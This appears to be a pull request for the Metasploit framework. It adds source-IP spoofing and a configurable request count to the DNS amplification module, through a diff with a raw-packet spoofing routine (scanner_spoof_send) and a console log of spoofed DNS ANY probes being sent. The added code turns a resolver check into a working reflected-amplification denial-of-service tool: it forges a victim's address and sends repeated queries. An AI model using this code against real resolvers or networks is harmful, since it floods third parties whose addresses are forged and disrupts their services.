### PR TITLE
SRC IP spoofing for the DNS amplification module

### DIFF
--- a/lib/msf/core/auxiliary/drdos.rb
+++ b/lib/msf/core/auxiliary/drdos.rb
@@ -8,6 +8,15 @@ module Msf
 ###
 module Auxiliary::DRDoS
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
   def prove_amplification(response_map)
     vulnerable = false
     proofs = []
@@ -43,5 +52,8 @@ module Auxiliary::DRDoS
     [ vulnerable, proofs.join(', ') ]
   end
 
+  def spoofed?
+    !datastore['SRCIP'].nil?
+  end
 end
 end

--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@@ -69,6 +69,24 @@ module Auxiliary::UDPScanner
     scanner_postscan(batch)
   end
 
+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = data
+    p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
+    1.upto(num_packets) do |x|
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
   # Send a packet to a given host and port
   def scanner_send(data, ip, port)
 

--- a/modules/auxiliary/scanner/dns/dns_amp.rb
+++ b/modules/auxiliary/scanner/dns/dns_amp.rb
@@ -8,7 +8,9 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Auxiliary::UDPScanner
+  include Msf::Auxiliary::DRDoS
 
   def initialize
     super(
@@ -89,7 +91,12 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def scan_host(ip)
-    scanner_send(@msearch_probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@msearch_probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@msearch_probe, ip, datastore['RPORT'])
+    end
   end
 
   def scanner_process(data, shost, sport)


### PR DESCRIPTION
This PR adds IP spoofing to the DNS amplification module.

``` text
msf auxiliary(dns_amp) > set RHOSTS 10.0.0.61
RHOSTS => 10.0.0.61
msf auxiliary(dns_amp) > set SRCIP 10.0.0.60
SRCIP => 10.0.0.60
msf auxiliary(dns_amp) > set NUM_REQUESTS 3
NUM_REQUESTS => 3
msf auxiliary(dns_amp) > run

[*] Sending DNS probes to 10.0.0.61->10.0.0.61 (1 hosts)
[*] Sending 67 bytes to each host using the IN ANY isc.org request
[*] Sending 3 packet(s) to 10.0.0.61 from 10.0.0.60
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```
